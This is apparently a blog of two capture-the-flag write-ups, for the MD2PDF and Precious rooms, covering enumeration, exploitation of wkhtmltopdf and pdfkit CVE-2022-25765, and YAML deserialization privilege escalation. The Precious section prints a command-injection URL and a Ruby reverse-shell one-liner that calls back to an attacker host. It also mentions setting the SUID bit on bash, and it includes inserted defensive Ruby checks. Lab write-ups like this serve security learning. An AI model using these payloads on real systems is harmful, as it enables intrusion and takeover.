Tuesday, February 21, 2023

THM - MD2PDF

 

Enumeration

We start with running nmap on the target to see what is running.
nmap -sC -sV -T 4 <target ip>
 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-20 16:27 GMT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
WARNING: Service 10.10.96.67:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.10.96.67:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.96.67
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 753a85da4c79ab329dbb3486e2b0f9d6 (RSA)
|   256 60a68b3edac21e6987adb7a637db2793 (ECDSA)
|_  256 723233926e17948b751872c82e7123f5 (ED25519)
80/tcp   open  rtsp
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2660
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./static/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./static/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest:
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|_    Content-Length: 0
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
|_http-title: MD2PDF
5000/tcp open  rtsp
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2624
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./assets/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./assets/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|     Content-Length: 0
|   RTSPRequest:
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|_    Content-Length: 0
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
<snip>------------<snip>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
 
Ports 22, 80 and 5000 are open. We will go straight to port 80 and continue our enumeration there.
 
The server is hosting a Markdown to PDF converter. Let's convert something and see what is being used on the back end. 

It is using wkhtmltopdf 0.12.5 to convert the MD. Researching exploits and vulnerabilities for this version brings us to file inclusion! 

Let's find out what directories are on the server using gobuster.
 
└─$ gobuster dir --url http://10.10.96.67/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.96.67/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/02/20 17:10:11 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 166]
/convert              (Status: 405) [Size: 178]
Progress: 87615 / 87665 (99.94%)
===============================================================
2023/02/20 17:18:37 Finished
===============================================================

 
Interesting: there are /admin and /convert pages.

Exploitation

We want to get this admin page included in the conversion. First, let's test whether any input sanitisation is happening.



We seem to be able to use HTML tags without restriction, so let's try an iframe that includes the admin page. Unfortunately I forgot to screenshot the result, but it didn't work! Remembering that port 5000 was open, we adjust slightly.

 
 
And we have the flag!

 


 

Thursday, February 16, 2023

HTB - Precious

Enumeration

First things first, let's run some basic enumeration to see what is running. 
 
 nmap -sC -sV -Pn -T 4 <target IP>
 ---------------
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-15 14:35 GMT
Nmap scan report for 10.10.11.189
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.99 seconds
 ---------------
 
SSH and HTTP are open, and port 80 redirects to http://precious.htb, so let's add that to our hosts file.
 
 echo '10.10.11.189    precious.htb' | sudo tee -a /etc/hosts

If we now go to precious.htb we're greeted with a web page for converting web pages to PDFs.
 
Testing to see what is accepted:
test.com - no
/test/test - no

http://test.com - yes
 


We can fire up an HTTP server to see how the site works:
python3 -m http.server 8000

Let's just throw in http://<my-IP>:8000/

We get a nice PDF of the directory listing. Let's download it and see what process is being used to create the PDF.

Open it with Atril Document Viewer, as that is what we have to hand, and check the PDF's properties.
 
 

Awesome, we now know the process involves pdfkit v0.8.6 and we can go to our favourite search engine and see if there are any known exploits!

Bingo! We've got some Command Injection | CVE-2022-25765
 

Exploitation

Reading and viewing various sources for this exploit, we can begin to understand how to use the PoC.

Using the PoC from security.snyk.io, we send a request with a name parameter whose value wraps our command in backticks.

http://<our-IP>:8000/?name=%20`whoami`
 
 

Let's use the reverse shell from CyberArchitect

http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",LOCAL-LISTEN-PORT))'`
 
Before running, set up your listener. 
 

We have a shell!
 
Switching to our home folder, we see a .bundle folder containing a config file. cat that file and we get a password for the account henry.

We can now use these newly obtained credentials to SSH into the box.
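Both this box's pdfkit injection and the iframe trick in the MD2PDF write-up above come down to a PDF converter acting on a URL the user controls, so one check covers both. The Ruby below is an added defender-side example, not code from either room or from pdfkit: a URL policy that rejects shell metacharacters and non-public hosts, and a pre-conversion scan of rendered HTML for the elements wkhtmltopdf would fetch. The http(s)-to-public-hosts policy and the sample HTML are assumptions constructed for the example.

```ruby
require 'uri'
require 'ipaddr'

# Elements wkhtmltopdf fetches while rendering; a user-controlled src/href here is a
# request the converter makes from the server, which is how an internal page lands in the PDF.
FETCHING_ELEMENTS = %w[iframe frame img script link object embed source video audio].freeze

# Returns nil when the converter may fetch raw, otherwise a short reason.
# The policy itself is an assumption for this example: http(s) to public hosts only.
def url_policy_violation(raw)
  # pdfkit-style injection rides on whitespace and shell metacharacters inside the URL
  return 'whitespace or shell metacharacter' if raw.match?(/[\s`$;|&<>()]/)
  uri = URI.parse(raw)
  return 'scheme not http(s)' unless %w[http https].include?(uri.scheme)
  host = uri.hostname.to_s
  return 'empty host' if host.empty?
  return 'loopback hostname' if host.casecmp?('localhost') || host.end_with?('.localhost')
  begin
    ip = IPAddr.new(host)
    return 'non-public address' if ip.loopback? || ip.private? || ip.link_local? || ip.to_s == '0.0.0.0'
  rescue IPAddr::InvalidAddressError
    # a hostname, not a literal: DNS resolution and rebinding are not covered by this check
  end
  nil
rescue URI::InvalidURIError
  'unparseable URL'
end

# Scan rendered HTML (after the Markdown step, before wkhtmltopdf) for elements whose
# src/href violates the policy. Returns [[element, url, reason], ...]; a regex pre-check
# only, not a replacement for an HTML parser plus network isolation of the converter.
def embedded_fetch_violations(html)
  findings = []
  html.scan(/<\s*(#{FETCHING_ELEMENTS.join('|')})\b([^>]*)>/i) do |element, attrs|
    attrs.scan(/\b(?:src|href)\s*=\s*["']?([^"'\s>]+)/i) do |(url)|
      reason = url_policy_violation(url)
      findings << [element.downcase, url, reason] if reason
    end
  end
  findings
end

# Constructed sample: what a Markdown renderer might emit for a submission that
# embeds the converter host's own admin page, the pattern used in the MD2PDF room.
SAMPLE_HTML = <<~HTML
  <h1>Quarterly report</h1>
  <p><img src="https://example.com/logo.png" alt="logo"></p>
  <iframe src="http://localhost:5000/admin"></iframe>
  <img src="http://127.0.0.1:5000/admin">
HTML
```

Running embedded_fetch_violations(SAMPLE_HTML) flags the iframe and the second img and lets the external logo through; url_policy_violation alone is the check to apply to a direct URL field like the one on precious.htb.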
 

Privilege Escalation

Henry has permission to run update_dependencies.rb as root. Looking at the file, we find it uses YAML.load, which is vulnerable to a deserialization attack.
 
 
A payload can be found here 
With a blog post running through it here

We know from investigating update_dependencies.rb that it loads the file dependencies.yml.

Create the file dependencies.yml and add the payload.

We're a step closer to root. We can edit the command now to try and get a shell. We're going to set the SUID bit on bash to allow henry to run bash as root.

The final payload looks like this:

We run it, we're root, we switch to the home directory and we claim the flag!
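As an added example (not the room's script) of how a privileged script like update_dependencies.rb should read dependencies.yml: Psych's restricted loader refuses any !ruby/... class tag, and a shape check stops the script trusting anything beyond a flat gem-to-version map. The sample YAML is constructed, and OpenStruct stands in as a harmless class name; on Ruby 3.1+ (Psych 4) YAML.load already delegates to safe_load, so the distinction matters on older interpreters such as the one on this box.

```ruby
require 'yaml'

# Constructed sample: the flat "gem: version" list a dependency updater expects.
PLAIN_DEPS = <<~YAML
  nokogiri: "1.13.1"
  rails: "7.0.4"
YAML

# Constructed sample: the same file carrying a Ruby object tag. A full loader
# instantiates whatever class the tag names, which is the root of the YAML
# deserialization problem; the tag here names a harmless class on purpose.
TAGGED_DEPS = <<~YAML
  nokogiri: !ruby/object:OpenStruct
    table:
      version: "1.13.1"
YAML

# Parse with the restricted loader: only scalars, arrays and hashes come back,
# and any !ruby/... tag raises Psych::DisallowedClass instead of building an object.
def load_dependencies(text)
  YAML.safe_load(text, permitted_classes: [], aliases: false)
end

# True when the document is rejected for carrying a class tag.
def rejects_object_tag?(text)
  load_dependencies(text)
  false
rescue Psych::DisallowedClass
  true
end

# Shape check a root-run updater should apply before acting on the file:
# a Hash of String gem names to String versions, nothing else.
def valid_dependency_map?(data)
  data.is_a?(Hash) && data.all? { |gem, ver| gem.is_a?(String) && ver.is_a?(String) }
end
```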

 
